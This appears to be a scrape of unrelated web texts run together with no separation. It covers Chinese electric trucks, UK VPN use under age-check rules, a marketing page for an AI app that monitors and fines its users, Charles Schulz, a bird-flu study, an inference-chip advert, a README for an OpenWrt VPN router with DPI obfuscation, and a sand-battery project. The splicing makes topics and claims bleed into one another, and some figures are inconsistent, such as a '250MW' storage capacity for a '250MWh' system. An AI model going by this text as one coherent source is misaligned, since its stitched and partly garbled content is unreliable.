Western OEMs entered the electric truck market with the platforms they already understood. Most began by taking a diesel tractor frame, removing the engine and gearbox and adding batteries, motors and the associated power electronics. This approach kept production lines moving and reduced near term engineering risk, but it produced electric trucks that carried the compromises of diesel architecture. Battery boxes hung from ladder frames, wiring loops wound through spaces never designed for high voltage systems and weight distribution was optimized for a drivetrain that no longer existed. Several OEMs even explored hydrogen drivetrains inside the same basic frames, which locked in the limitations of a platform built around an internal combustion engine. The results were heavier trucks with less space for batteries, higher costs and lower overall efficiency.
The shift toward purpose built electric tractors is only now underway among the major Western OEMs. Volvo’s FH Electric and FM Electric, Daimler’s eActros 300 and 600, Scania’s new battery electric regional tractor and MAN’s eTruck all represent clean sheet or near clean sheet electric designs with integrated drivetrains and optimized battery packaging. These models move Western OEMs closer to the design philosophy that Chinese manufacturers adopted earlier, where the entire platform is built around the electric driveline from the start.
China has moved faster toward battery electric heavy trucks than any other major market. It built supply chains for motors, inverters, LFP cells, structural packs and integrated e-axles. It created standard designs and cut costs through volume. It encouraged competition. It is now exporting electric trucks into Asia, Latin America and Africa. Europe and North America are watching this unfold while debating the right charging standards and duty cycle models. The arrival of low cost electric trucks from China raises uncomfortable questions for Western OEMs and policymakers, but it also provides an opportunity. If freight electrification can happen at one third the expected cost, then the pace of decarbonization can be much faster. The challenge is deciding how to integrate or respond to the cost structure that China has already built.
The story of heavy trucking is no longer a slow migration from diesel to a distant alternative. The transition is already underway at scale inside the world’s largest heavy truck market. It does not look like the long haul hydrogen scenario that dominated Western modelling for the last decade. It looks like battery electric trucks built cheaply and deployed quickly into short haul service. The economic logic is straightforward. The operational fit is strong. The supply chain is built. The lesson for Western operators and policymakers is that the cost curve has shifted. The decisions that made sense even in 2024 do not match the realities of 2025. The market is moving toward electric freight because it is becoming cheaper than diesel across the majority of real world duty cycles. From the short haul electric trucks will come the new generation of long haul trucks, as night follows day. The arrival of low cost battery trucks from China marks the beginning of a new phase in freight decarbonization.
After the Online Safety Act’s onerous internet age restrictions took effect this summer, it didn’t take long for Brits to get around them. Some methods went viral, like
using video game
Death Stranding
’s photo mode to bypass face scans
. But in the end, the simplest solution won out: VPNs.
Virtual private networks have proven
remarkably effective
at circumventing the UK’s age checks, letting users spoof IP addresses from other countries so that the checks never appear in the first place. The BBC
reported
a few days after the law came into effect that five of the top 10 free apps on the iOS App Store were VPNs.
WindscribeVPN shared data
showing a spike in its user figures, NordVPN
claimed
a 1,000 percent increase in purchases that weekend, and ProtonVPN reported an even higher 1,800 percent increase in UK signups over the same period.
This has not gone unnoticed in the halls of power. Murmurings have begun that something needs to be done, that the UK’s flagship child safety law has been made a mockery, and that VPNs are the problem.
The OSA
became UK law in 2023
, but it took until July for its most significant measures to take effect. It requires websites and online service providers to implement “strong age checks” to prevent under-18s from accessing a broad swathe of “harmful materials,” mostly meaning pornography and content promoting suicide or self-harm. In practice, it means everything from porn sites to Bluesky now require UK users to pass age checks, usually through credit card verification or facial scans, to get full access. You can see why so many of us signed up for VPNs.
Children’s Commissioner Rachel de Souza, a figure appointed by the government to represent children’s interests,
told the BBC
in August that access to VPNs was “absolutely a loophole that needs closing.” Her office
published a report
calling for the software to be gated behind the same “highly effective age assurance” that people are using them to avoid.
“Nothing is off the table.”
De Souza isn’t alone. The government has
faced calls
in the House of Lords to ask why VPNs weren’t taken into account in the first place, while a
proposed amendment
to the Children’s Wellbeing and Schools Bill would institute de Souza’s age-gating requirement. Even as far back as 2022, long before the Labour Party came into power, Labour MP Sarah Champion
predicted
that VPNs would “undermine the effectiveness” of the OSA, and called for the then-government to “find solutions.”
A recent article by
Techradar
added to speculation that the government is considering action, reporting that Ofcom, the UK’s media regulator and enforcer of the OSA, is “monitoring VPN use” in the wake of the act.
Techradar
couldn’t confirm exactly what form that monitoring takes, though Ofcom insisted fears that individual usage is being tracked are unfounded. An anonymous spokesperson for Ofcom would only confirm to the site that it uses “a leading third-party provider,” and that the data is aggregated, with “no personally identifiable or user-level information.” (Anonymized data
often isn’t
, but of course, we don’t know whether that’s the case here.)
Still, that research might be an important piece of the puzzle. While VPN use has clearly increased in the country since July, it’s less certain how much of that is coming from kids, and how much from adults reluctant to hand over biometric or financial data to log into Discord. Ofcom is researching children’s VPN use, but that work will take time.
The government has always insisted that it isn’t banning VPNs, and so far that hasn’t changed. “There are no current plans to ban the use of VPNs, as there are legitimate reasons for using them,” Baroness Lloyd of Effra, a minister in the Department for Science, Innovation and Technology,
told the House of Lords
last month. Then again, she shortly added that “nothing is off the table,” leaving the specter of VPN restrictions still at large.
“It’s very hard to stop people from using VPNs.”
A full ban, such as by requiring internet service providers to block VPN traffic at the source, would be unlikely in any case. There’s no serious political outcry for one, and as the government itself admits, there are plenty of good reasons to use a VPN that have nothing to do with age restrictions on porn.
“VPNs serve many purposes,” Ryan Polk, director of policy at the Internet Society, told me. “Businesses use them to enable secure employee logins; journalists rely on them to protect sources; members of marginalized communities use them to ensure private communication; everyday users benefit from online privacy and security; and even gamers use them to improve performance and reduce latency.”
Besides, everyone I’ve asked about it agrees that banning VPNs would be an uphill battle. “Blocking VPN usage is technically complex and largely ineffective,” Laura Tyrylyte, Nord Security’s head of public relations, told me. James Baker, platform power and free expression program manager at the Open Rights Group, put it even more simply: “It’s very hard to stop people from using VPNs.”
Some have suggested that the government could require sites covered by the OSA restrictions to block all traffic from VPNs, just as many streaming services already do. That brings its own complications though.
“Websites that offer the content would face an impossible choice,” says Polk, because there’s no reliable way to tell if a VPN user is originally from the UK or somewhere else. “They would either have to block all users from the UK (abandoning the market) or block all VPN users from accessing their website.”
That leaves age-restricting VPNs themselves as the likeliest outcome. The OSA already prohibits online platforms from promoting VPNs to children as a way of circumventing age checks, so extending the act to encompass VPNs themselves might not be too much of a stretch. Technically speaking, this would be the easiest option to implement, but it still comes with downsides.
Both Tyrylyte and Baker warn that any attempt to limit VPN usage would push people toward riskier behavior, whether that be less reputable VPNs with bad privacy practices, or simpler forms of direct file-sharing, like USB sticks, that introduce new security risks. In a sense, that’s happened already — both point out that Nord and other paid VPNs require a credit card, meaning underaged users are likely flocking to free options, which Baker calls a privacy risk, “as they are likely just selling your personal data.”
The UK was one of the first countries to implement online age restrictions, but just as other countries and states have followed in its footsteps there, we can expect more governments to put VPNs under scrutiny before long. Australia has banned social media for under-16s, the EU is trialling its own restrictions, and various US states have implemented age limits on the internet. As long as VPNs remain the most effective workaround, VPN restrictions will be a point of debate. In the US, they already are. Republicans in Michigan have
proposed an ISP-level ban on VPNs
, while Wisconsin lawmakers are
debating a proposal
to require adult sites to block VPN traffic entirely.
Wherever you live, the VPN panic is only getting started.
Follow topics and authors
from this story to see more like this in your personalized homepage feed and to receive email updates.
Hey, can I get just 1 minute on Instagram quickly?
Instagram Unblocked
Granted 1 minute. Timer starts now.
Need 15 minutes now to check something important.
Denied. Your rules only allow extended unblocks during designated meal times (12-1 PM, 6-7 PM) and require photo verification of your meal.
→ Screen Time Disconnected
Screen Time has been manually disabled by the user.
Penalty Applied
$25 charged for disconnecting Screen Time integration against rules.
Chat with me
Strict Screen Time
Block distracting apps and websites with the most powerful screen time controls available.
Wake-up Call
Get out of bed on time every morning with calls and escalating consequences.
Workout Consistency
Track your workouts through app integrations and maintain your fitness streak.
Bedtime Enforcement
Wind down and get to sleep on time every night with progressive device restrictions.
[01]
Overlord Integrations
Integrate apps with Overlord. The more data, the more accountability.
Apple Health
Sleep Cycle
Withings
Screen Time
Mac Activity
Location
IFTTT
Soon
MCP
→ Apple Health Data
3km walk completed.
Screen Unblocked
Screen unblocked until 9am.
Congratulations! You've completed your morning walk. Your screens are unblocked until 9am.
Chat with me
[02]
Overlord Controls You
There are many ways Overlord can force you to add structure to your life.
Approve Goal
Fail Goal
Edit Goal
Skip Goal
Screen Block
Charge User
Phone Call
Text Friend
Reminder: Your goal is to be outside by 8:00 AM. Please send a photo to confirm.
Final reminder: 15 minutes left to send your photo and avoid the penalty for not being outside by 8:00 AM.
It's 8:01 AM, and I haven't received your photo confirming you're outside.
User Charged
$10 charged for failing 'Outside by 8 AM' goal.
The penalty has been processed. Let's aim to hit that goal tomorrow!
Chat with me
[03]
iOS Control
Overlord can give you unblocks, stop you from disabling Screen Time permissions, and lock away your Screen Time passcode.
Dynamic Blocking
Tamper Detection
Push-ups
Mac Work
Heart Rate
GPS Brick
Calendar
5-Min Notice
Can I get just 1 minute on Instagram?
Granted. 1 minute on Instagram, starting now.
Instagram Unblocked
Access granted for 1 minute.
Meal photo received! As per your 'Mealtime Unblock' rule, you get 30 minutes of unrestricted access. Enjoy your break!
Apps Unblocked
Unrestricted access for 30 minutes.
→ Location Updated
Entered: Office (Geofence)
Welcome to the office! Engaging 'Work Focus' mode. All non-work apps are now blocked via Screen Time until 5:00 PM.
Work Focus Active
Non-work apps blocked until 5:00 PM.
Chat with me
Overlord on Mac
Overlord knows exactly what you're doing on your Mac. Configure words to trigger a message to Overlord, blocks, and send in pomodoros
What have I actually been doing for the last hour?
You spent 25m in VS Code (active coding), 18m on Chrome (split between Stack Overflow & GitHub issues), 12m idle, and 5m swapping tracks on Spotify.
Tracks Everything
Every ten seconds, Overlord tracks all applications, websites, and website titles that you have open.
Need a quick break on YouTube, can you unblock for 10 mins?
You sure? Okay, 10 mins it is. If I see you scrolling shorts instead of that tutorial, the block snaps back on.
Flexible Blocking
Overlord manages your blocks, providing the leniency other blockers lack.
→ Pomodoro Complete
45min Pomodoro complete. 92% focus, 40s inactivity, slight YouTube relapse but got back to work after reminder.
Fantastic! That's seven of nine Pomodoros completed today. Complete another two to avoid me calling your co-founder!
Pomodoro
Send Pomodoro timers to Overlord, ensuring you stay productive during work sessions.
→ Trigger Word Detected
"political" found on YouTube: 'Debate Highlights: Key Political Moments'.
Trigger word "political" detected on YouTube. Initiating call to persuade user off distracting content.
Trigger Words
If detected, Overlord can block sites, call you, charge penalties, and more.
Frequently Asked Questions
Overlord is an AI accountability partner. It's fairly hardcore, and no-bullshit, but you can tune it to be nice if you want. It's not meant to be there for emotional support, but moreso to apply hard, but flexible, guardrails to your life. I like this thought experiment: Imagine if a firm-but-fair friend, who cares about you, is awake 24/7, and watching a monitor with where you are, what you're spending money on, what you're browsing on your computer, etc. They can call you, text you, text your friends, take money off you, etc. How would this make you live a better life?
Overlord is designed to be as strict as you want it to be. Typical users let the Overlord know when they're prone to cheating (ie, early in the morning, before the gym, etc), so Overlord will be stricter around those times.
Overlord is designed to be like a human. If you want it to be super strict, just let it know. If you want it to be lenient, that's great too!
Overlord is on iOS, Android, and Mac. The Mac app is currently the iPad app, but we are working on a native Mac app. The Mac integration is a separate app, and is a native Mac app.
You can customise the personality, and rules for each action. Overlord also learns as you message it.
Overlord is designed to be like a human. Ie, in these instances, it will try to balance strictness with fairness.
Goals are assessed every night at midnight in your local timezone. At this point, Overlord determines whether you've successfully completed or failed the goal based on the criteria and integrations you've set up.
Our iOS integration works with Apple's Screen Time. By default, apps you want to control can be blocked. Overlord then acts as the gatekeeper, granting temporary unblocks or exceptions based on your predefined rules, completed tasks, or specific requests you make through the Overlord chat.
First, download the Overlord app on your iOS or Android device. Inside the app's settings or integrations section, you'll find an option for the Mac utility. You can input your email there, and we'll send you a direct download link for the Mac application.
No, all activity data it collects for monitoring purposes is stored only locally on your Mac. It only communicates with the Overlord app to report on goal completion or trigger actions based on your rules, not to upload raw activity logs to the cloud.
Absolutely! We want you to succeed. My (Josh) personal phone number is available within the app. Please feel free to call or FaceTime me directly if you'd like guidance, ideas, or assistance in setting up your goals to be as effective as possible.
For probably half the population, self-control is probably their #1 issue. This previously wasn't a solvable issue (some things helped, like screen blockers, and personal trainers), but in the age of AI, I believe that self-control - at least on a minute-by-minute, hour-by-hour basis - is now in the realm of a solvable engineering problem.
Self-Control is Solved
In the AI age, self-control is a solved problem. Download Overlord now.
How Charles M Schulz created Charlie Brown and Snoopy (2024)
Charles M Schulz drew his beloved Peanuts strip for 50 years until his announcement on 14 December 1999 that ill health was forcing him to retire. In History looks at how an unassuming cartoonist built a billion-dollar empire out of the lives of a group of children, a dog and a bird.
Charles M Schulz's timeless creation Charlie Brown may have been as popular as any character in all of literature, but the cartoonist was modest about the scope of his miniature parables. In a 1977 BBC interview, he said: "I'm talking only about the minor everyday problems in life. Leo Tolstoy dealt with the major problems of the world. I'm only dealing with why we all have the feeling that people don't like us."
This did not mean that he felt as if he was dealing with trivial matters. He said: "I'm always very much offended when someone asks me, 'Do I ever do satire on the social condition?' Well, I do it almost every day. And they say, 'Well, do you ever do political things?' I say, 'I do things which are more important than politics. I'm dealing with love and hate and mistrust and fear and insecurity.'"
WATCH: 'Cartooning is drawing funny pictures whether they're silly or rather meaningful political cartoons'.
While Charlie Brown may have been the eternal failure, the universal feelings that Schulz channelled helped make
Peanuts
a global success. Born in 1922, Schulz drew every single Peanuts strip himself from 1950 until his death in February 2000. It was so popular that Nasa named two of the modules in its May 1969
Apollo 10 lunar mission
after Charlie Brown and Snoopy. The strip was syndicated in more than 2,600 newspapers worldwide, and inspired films, music and countless items of merchandise.
Part of its success, according to the writer Umberto Eco, was that it worked on different levels.
He wrote
: "Peanuts charms both sophisticated adults and children with equal intensity, as if each reader found there something for himself, and it is always the same thing, to be enjoyed in two different keys. Peanuts is thus a little human comedy for the innocent reader and for the sophisticated."
Schulz's initial reason for focusing on children in the strip was strictly commercial. In 1990, he
told the BBC
: "I always hate to say it, but I drew little kids because this is what sold. I wanted to draw something, I didn't know what it was, but it just seemed as if whenever I drew children, these were the cartoons that editors seemed to like the best. And so, back in 1950, I mailed a batch of cartoons to New York City, to United Features Syndicate, and they said they liked them, and so ever since I've been drawing little kids."
Bird flu viruses are resistant to fever, making them a major threat to humans
Bird flu viruses are a particular threat to humans because they can replicate at temperatures higher than a typical fever, one of the body's ways of stopping viruses in their tracks, according to new research led by the universities of Cambridge and Glasgow.
In a study published today in
Science
, the team identified a gene that plays an important role in setting the temperature sensitivity of a virus. In the deadly pandemics of 1957 and 1968, this gene transferred into human flu viruses, and the resulting virus thrived.
How flu viruses thrive in the body
Human flu viruses cause millions of infections every year. The most common types of these viruses, which cause seasonal flu, are known as influenza A viruses. They tend to thrive in the upper respiratory tract, where the temperature is around 33°C, rather than deep in the lungs in the lower respiratory tract, where the temperature is around 37°C.
Unchecked, a virus will replicate and spread throughout the body, where it can cause illness, occasionally severe. One of the body's self-defense mechanisms is fever, which can cause our body temperature to reach as high as 41°C, though until now it has not been clear how fever stops viruses—and why some viruses can survive.
Unlike human flu viruses, avian influenza viruses tend to thrive in the lower respiratory tract. In fact, in their natural hosts, which include ducks and seagulls, the virus often infects the gut, where temperatures can be as high as 40°C–42°C.
Research methods and findings
In previous studies using cultured cells, scientists have shown that avian influenza viruses appear more resistant to temperatures typically seen in fever in humans. Today's study uses in vivo models—mice infected with influenza viruses—to help explain how fever protects us and why it may not be enough to protect us against avian influenza.
An international team led by scientists in Cambridge and Glasgow simulated in mice what happens during a fever in response to influenza infections. To carry out the research, they used a laboratory-adapted influenza virus of human origin, known as PR8, which does not pose a risk to humans.
Although mice do not typically develop fever in response to influenza A viruses, the researchers were able to mimic its effect on the virus by raising the ambient temperature where the mice were housed (elevating the body temperature of the mice).
The researchers showed that raising body temperature to fever levels is effective at stopping human-origin flu viruses from replicating, but it is unlikely to stop avian flu viruses. Fever protected against severe infection from human-origin flu viruses, with just a 2°C increase in body temperature enough to turn a lethal infection into a mild disease.
The research also revealed that the PB1 gene of the virus, important in the replication of the virus genome inside infected cells, plays a key role in setting the temperature-sensitivity. Viruses carrying an avian-like PB1 gene were able to withstand the high temperatures associated with fever, and caused severe illness in the mice. This is important, because human and bird flu viruses can "swap" their genes when they co-infect a host at the same time, for example when both viruses infect pigs.
Expert perspectives and implications
Dr. Matt Turnbull, the first author of the study, from the Medical Research Council Center for Virus Research at the University of Glasgow said, "The ability of viruses to swap genes is a continued source of threat from emerging flu viruses. We've seen it happen before during previous pandemics, such as in 1957 and 1968, where a human virus swapped its PB1 gene with that from an avian strain. This may help explain why these pandemics caused serious illness in people.
"It's crucial that we monitor bird flu strains to help us prepare for potential outbreaks. Testing potential spillover viruses for how resistant they are likely to be to fever may help us identify more virulent strains."
Senior author Professor Sam Wilson, from the Cambridge Institute of Therapeutic Immunology and Infectious Disease at the University of Cambridge, said, "Thankfully, humans don't tend to get infected by bird flu viruses very frequently, but we still see dozens of human cases a year. Bird flu fatality rates in humans have traditionally been worryingly high, such as in historic H5N1 infections that caused more than 40% mortality.
"Understanding what makes bird flu viruses cause serious illness in humans is crucial for surveillance and pandemic preparedness efforts. This is especially important because of the pandemic threat posed by avian H5N1 viruses."
The findings may have implications for the treatment of infections, though the team stresses that more research is needed before changes are considered for treatment guidelines. Fever is often treated with antipyretic medications, which include ibuprofen and aspirin. However, there is clinical evidence that treating fever may not always be beneficial to the patient and may even promote transmission of influenza A viruses in humans.
More information:
Matt Turnbull et al, Avian-origin influenza A viruses tolerate elevated pyrexic temperatures in mammals,
Science
(2025).
DOI: 10.1126/science.adq4691
Citation
:
Bird flu viruses are resistant to fever, making them a major threat to humans (2025, November 27)
retrieved 27 November 2025
from https://medicalxpress.com/news/2025-11-bird-flu-viruses-resistant-fever.html
This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no
part may be reproduced without the written permission. The content is provided for information purposes only.
In the world of AI data centers, speed, efficiency, and scale aren’t optional—they’re everything. Jotunn8, our ultra-high-performance inference chip is built to deploy trained models with lightning-fast throughput, minimal cost, and maximum scalability. Designed around what matters most—performance, cost-efficiency, and sustainability—they deliver the power to run AI at scale, without compromise!
Why it matters: Critical for real-time applications like chatbots, fraud detection, and search.
Reasoning models, Generative AI and Agentic AI are increasingly being combined to build more capable and reliable systems. Generative AI provide flexibility and language fluency. Reasoning models provide rigor and correctness. Agentic frameworks provide autonomy and decision-making. The VSORA architecture enables smooth and easy integration of these algorithms, providing near-theory performance.
Why it matters: AI inference is often run at massive scale – reducing cost per inference is essential for business viability.
Show HN: Whole-home VPN router with hardware kill switch (OpenWrt and WireGuard)
Whole-home VPN router with hardware kill switch
- Protect every device on your network with OpenWrt, WireGuard, and AmneziaWG. No apps required.
🤖 Using an AI coding agent?
Give it access to this entire repo and read
AGENTS.md
for guided deployment. Supports Claude, GPT, Gemini, and other frontier models.
TL;DR
Turn a Raspberry Pi or mini PC into a VPN gateway that protects your entire home network:
This stack solves all of these problems
- every device on your network routes through an encrypted tunnel. No browsing history for your ISP. No identity verification per-site. No apps to install or forget to enable.
Why Network-Level VPN?
The Problem with Per-Device VPN Apps
When you install a VPN app like Mullvad, NordVPN, or ProtonVPN on your phone or laptop, you're only protecting
that single device
. This leaves gaps:
Device
VPN App Support
Risk
Smart TV
❌ None
ISP sees all streaming
Gaming Console
❌ None
IP exposed to game servers
IoT Devices
❌ None
Smart home traffic visible
Guest Devices
❌ Can't control
No protection
Work Laptop
⚠️
May conflict
Corporate policy blocks VPN
Kids' Devices
⚠️
Can be disabled
Protection bypassed
VPN apps also:
Drain battery on mobile devices
Can be forgotten or disabled
Require updates on every device
May leak traffic during app crashes
Don't protect devices that can't run apps
The Network-Level Solution
This privacy router sits between your modem and your existing router.
Every device
on your network automatically routes through the VPN - no apps, no configuration, no exceptions.
Every device is protected:
Phones, tablets, laptops, smart TVs, gaming consoles, IoT devices, guests - everything.
Why Not Just Use Mullvad QUIC or WireGuard Apps?
Great question. Mullvad's QUIC tunnels and WireGuard apps are excellent for individual device protection. Here's when each approach makes sense:
VPN Apps Are Better When:
You only need to protect 1-2 devices
You travel frequently and use different networks
You want per-app split tunneling
You're on a network you don't control
Network-Level VPN Is Better When:
You have many devices (especially ones that can't run VPN apps)
You want "set and forget" protection for your entire household
You need to protect smart home/IoT devices
You want a
kill switch that actually works
(more on this below)
You're in a region with VPN blocking/deep packet inspection
The Kill Switch Problem
Here's something most people don't realize:
VPN app kill switches often fail
.
When a VPN app crashes, loses connection, or during the moments between connection drops and reconnection, your traffic can leak to your ISP. App-based kill switches try to prevent this, but they operate at the application level - if the app itself crashes, the kill switch dies with it.
This stack implements a hardware-level kill switch:
Normal Operation:
Device → Privacy Router → VPN Tunnel → Internet ✓
VPN Down (App-based kill switch):
Device → [App crashed] → ISP sees traffic ✗
VPN Down (This stack):
Device → Privacy Router → [No route exists] → Traffic blocked ✓
The kill switch is implemented in the
firewall and routing table
, not in software. If the VPN tunnel goes down, there is literally no route for traffic to take - it's not blocked by a rule that might fail, it simply has nowhere to go.
Features
Core Protection (Required)
Network-wide VPN
- All devices protected automatically
Hardware kill switch
- No traffic leaks, ever
IPv6 leak prevention
- IPv6 completely disabled
Reliability (Required)
Automatic recovery
- Watchdog restarts tunnel on failure
Boot persistence
- VPN starts automatically on power-up
Connection monitoring
- Continuous health checks
Optional Security Addons
AdGuard Home
- DNS-over-HTTPS encryption, ad/tracker blocking
BanIP
- Threat intelligence, malicious IP blocking
Traffic from LAN can
only
go to the VPN zone. There is no forwarding rule from LAN to WAN. This isn't a "block" rule that could be bypassed - the route simply doesn't exist.
Routing Table
# When VPN is UP:
default dev awg0 # All traffic → VPN tunnel
1.2.3.4 via 192.168.1.1 # VPN server → WAN (exception)# When VPN is DOWN:# No default route exists# Traffic has nowhere to go = blocked
Double Protection
Even if somehow a forwarding rule existed, the routing table provides a second layer: with no default route pointing to WAN, packets would be dropped anyway.
AmneziaWG: Defeating VPN Blocking
Some ISPs and countries use
Deep Packet Inspection (DPI)
to identify and block VPN traffic. Standard WireGuard has a recognizable packet signature.
AmneziaWG
is an obfuscated fork of WireGuard that adds:
Parameter
Purpose
Jc
Junk packet count
Jmin/Jmax
Junk packet size range
S1/S2
Init packet magic
H1-H4
Header obfuscation
These parameters make the traffic look like random noise rather than a VPN connection. Your VPN provider supplies these values.
When do you need this?
ISP throttles or blocks VPN traffic
You're in a country with VPN restrictions
Corporate networks block WireGuard
Standard WireGuard connections are unreliable
If your VPN works fine with regular WireGuard, you can use standard WireGuard instead - the architecture works with both.
Quick Start
Prerequisites
Hardware
: Raspberry Pi 4/5, x86 mini PC, VM, or any device with 2 NICs
VPN Account
: Mullvad, IVPN, ProtonVPN, or any WireGuard-compatible provider
Network Access
: Ability to place device between modem and router
Docker option coming soon:
A Docker deployment (Option C) is in testing for users who prefer containers. This is entirely optional - not required or recommended over Options A/B. If you're using an AI assistant, it can guide you through Docker setup even if container networking is unfamiliar.
This stack is designed for users in regions where privacy legislation is tightening:
Region
Legislation
Impact
UK
Online Safety Bill (2025)
Age verification required for adult content; third-party ID services track access
Australia
Social Media Age Verification (Dec 2025)
Under-16 ban with verification requirements
EU
Digital Services Act
Platform accountability with data retention
US States
Various age verification bills
State-level ID requirements expanding
Common privacy concerns this stack addresses:
ISPs required to log browsing history
Third-party age verification services collecting identity data
Data retention laws mandating surveillance
Privacy-invasive legislation expanding
A network-level VPN means no per-device verification, no browsing history for your ISP, and no identity disclosure to third-party verification services.
Note:
These providers use standard WireGuard. For basic privacy protection, this is sufficient. Use this stack with standard WireGuard configs - AmneziaWG obfuscation is optional.
AmneziaWG Obfuscation (Optional)
AmneziaWG adds traffic obfuscation to defeat deep packet inspection.
Most users don't need this
- it's for situations where:
Your ISP throttles or blocks VPN traffic
Network administrators block WireGuard
You need extra protection against traffic analysis
Option
Setup
Best For
Mullvad + AWG params
Use included example params
Most users needing obfuscation
Self-hosted Amnezia
Run your own server
Maximum control
Mullvad-specific example configs included:
openwrt/amneziawg/mullvad-awg0.conf.example
- Tunnel config with obfuscation
adguard/mullvad-AdGuardHome.yaml.example
- DNS using Mullvad DoH
High-Censorship Environments
If you're in a region where VPNs are actively blocked or criminalized
, WireGuard and AmneziaWG may not be sufficient. These environments require more advanced obfuscation:
Protocol
Description
VLESS + Reality
Traffic appears as normal HTTPS to major websites
XRay
Advanced proxy with multiple obfuscation modes
ShadowSocks
Encrypted proxy designed for restricted network environments
Tor + Bridges
Anonymity network with pluggable transports
For agents:
If your user is in a high-censorship environment, use deep research to find current best practices:
This stack focuses on WireGuard/AmneziaWG.
For VLESS, XRay, or other advanced protocols, users should research dedicated solutions or consider running
Amnezia VPN
which supports multiple protocols including XRay.
Hardware Recommendations
Minimum Requirements:
1GB RAM, dual network interfaces (built-in + USB), OpenWrt support. Recommended: 2GB+ RAM for AdGuard Home DNS filtering.
Budget (~$50-80)
Raspberry Pi 4 (2GB+) with USB Ethernet adapter
GL.iNet travel routers (some run OpenWrt)
Recommended (~$100-150)
Raspberry Pi 5 with USB 3.0 Ethernet
Zimaboard or similar x86 SBC
Performance (~$150-300)
Mini PC with dual NICs (Intel N150 systems)
Protectli Vault or similar
Homelab / Enterprise
Virtual machine on existing hypervisor (Proxmox, ESXi, Hyper-V)
Dedicated x86 firewall appliance
Security Considerations
What This Protects Against
ISP traffic monitoring and logging
Network-level ad tracking
DNS hijacking and monitoring
IP-based geolocation
Traffic correlation (when combined with good OpSec)
For complex deployments or troubleshooting, give an AI coding agent access to this
entire repository
plus SSH access to your router (if you don't know how, ask the agent to guide you).
Recommended:
This stack was developed, tested, and deployed using
Claude Opus 4.5
via
Claude Code
. For best results, use a capable frontier model that can execute shell commands and understand network configuration:
Claude Opus 4.5 / Sonnet 4.5
(Anthropic) - Used for this implementation
GPT-5.1
(OpenAI)
Gemini 3
(Google)
What the agent can do:
Network audit
- Probe your current setup and identify requirements
Guided configuration
- Generate configs with your specific IPs, keys, and preferences
Automated troubleshooting
- Diagnose routing, firewall, and DNS issues in real-time
Scripted deployment
- Execute installation steps with your approval
Quick start:
Clone this repo or give agent GitHub access
Point agent to
AGENTS.md
- contains the full operational framework
Provide SSH credentials to your target device
Let agent audit, plan, and guide you through deployment
The agent instructions include diagnostic commands, validation tests, error recovery procedures, and safety rules. All configs in this repo are parameterized and agent-friendly.
Q: Will this slow down my internet?
A: Minimal impact. WireGuard is extremely efficient. Most users see <5% speed reduction. The main factor is your VPN provider's server quality.
Q: Can I still access local network devices?
A: Yes. LAN traffic stays local and doesn't go through the VPN.
Q: What if the privacy router fails?
A: Your network loses internet until it's fixed or bypassed. This is a feature, not a bug - it ensures no unprotected traffic leaks.
Q: Can I exclude certain devices from the VPN?
A: Yes, with additional configuration. You can create firewall rules to route specific IPs directly to WAN. See
CONFIGURATION.md
.
Q: Does this work with IPv6?
A: IPv6 is disabled to prevent leaks. Most VPN providers don't properly support IPv6 yet.
Q: Can my ISP see I'm using a VPN?
A: With standard WireGuard, they can see VPN-like traffic. With AmneziaWG obfuscation, the traffic appears as random noise.
Q: How does this help with age verification privacy concerns?
A: A VPN routes your traffic through an encrypted tunnel, preventing your ISP from logging which sites you visit. This is a
privacy tool
- it stops third-party age verification services from correlating your browsing activity across sites or building behavioral profiles. Your actual age verification with platforms remains between you and that platform, not shared with ISPs or data brokers. For specific compliance questions, consult local regulations.
Q: Will this work after the Australia social media ban takes effect?
A: This stack protects your network traffic from ISP logging and provides privacy for all devices. The December 2025 Australian legislation primarily affects platform-side verification. A VPN ensures your ISP cannot see which sites you visit, regardless of platform-level requirements.
Q: Is this legal?
A: VPN use is legal in most Western countries including the UK, Australia, US, and EU. This stack is a privacy tool similar to HTTPS - it encrypts your traffic. Using a VPN to access content available in your region is generally legal. Always check your local laws.
Protect your entire network. Set it and forget it.
250MWh 'Sand Battery' to start construction in Finland
Polar Night Energy and Lahti Energia are partnering on the Sand Battery project in Finland. Image: Polar Night Energy / Lahti Energia.
Technology provider Polar Night Energy and utility Lahti Energia have partnered for a large-scale project using Polar’s ‘Sand Battery’ technology for the latter’s district heating network in Vääksy, Finland.
The project will have a heating power of 2MW and a thermal energy storage (TES) capacity of 250MW, making it a 125-hour system and the largest sand-based TES project once complete.
It will supply heat to Lahti Energia’s Vääksy district heating network but is also large enough to participate in Fingrid’s reserve and grid balancing markets.
Polar Night Energy’s technology works by heating a sand or a similar solid material using electricity, retaining that heat and then discharging that for industrial or heating use.
This article requires
Premium Subscription
Basic (FREE) Subscription
Full premium access for the first month at only $1
Converts to an annual rate after 30 days unless cancelled
Cancel anytime during the trial period
Premium Benefits
Expert industry analysis and interviews
Digital access to PV Tech Power journal
Exclusive event discounts
Or continue reading this article for free
The project will cut fossil-based emissions in the Vääksy district heating network by around 60% each year, by reducing natural gas use bu 80% and also decreasing wood chip consumption.
This latest project will use locally available natural sand, held in a container 14m high and 15m wide. Lahti Energia received a grant for the project from state body Business Finland.
Polar Night Energy will act as the main contractor for the construction project, with on-site work beginning in early 2026, and the Sand Battery will be completed in summer 2027.
“We want to offer our customers affordable district heating and make use of renewable energy in our heat production. The scale of this Sand Battery also enables us to participate in Fingrid’s reserve and grid balancing markets. As the share of weather-dependent energy grows in the grid, the Sand Battery will contribute to balancing electricity supply and demand”, says Jouni Haikarainen, CEO of Lahti Energia.
NH Collection Vittorio Veneto, Rome, Italy
Across two packed days, the Summit focused on three core themes: revenue & trading, the lifecycle of the battery, and optimisation tools. Attendees explored innovative strategies for enhancing asset performance and longevity, with a spotlight on key markets like Germany, Italy, and the UK. Stay tuned for details on the 2025 edition of the Battery Asset Management Summit Europe, where we’ll continue to chart the path forward for energy storage asset management.
InterContinental London - The O2, London, UK
This isn’t just another summit – it’s our biggest and most exhilarating Summit yet! Picture this: immersive workshop spaces where ideas come to life, dedicated industry working groups igniting innovation, live podcasts sparking lively discussions, hard-hitting keynotes that will leave you inspired, and an abundance of networking opportunities that will take your connections to new heights!
Read Next
Nostromo Energy’s IceBrick thermal energy storage (TES) technology will participate in the California Independent System Operator (CAISO) wholesale energy market.
The utility-scale battery storage market in Italy is drawing huge interest and development activity, writes Solar Media Market Research analyst Josh Cornes.
A week of claimed first-of-their-kind advances in Germany’s BESS market, including the combination of monitoring, diagnostics and energy trading on one platform, an optimisation deal allowing multiple companies to trade one asset, and a law change accelerating permitting.
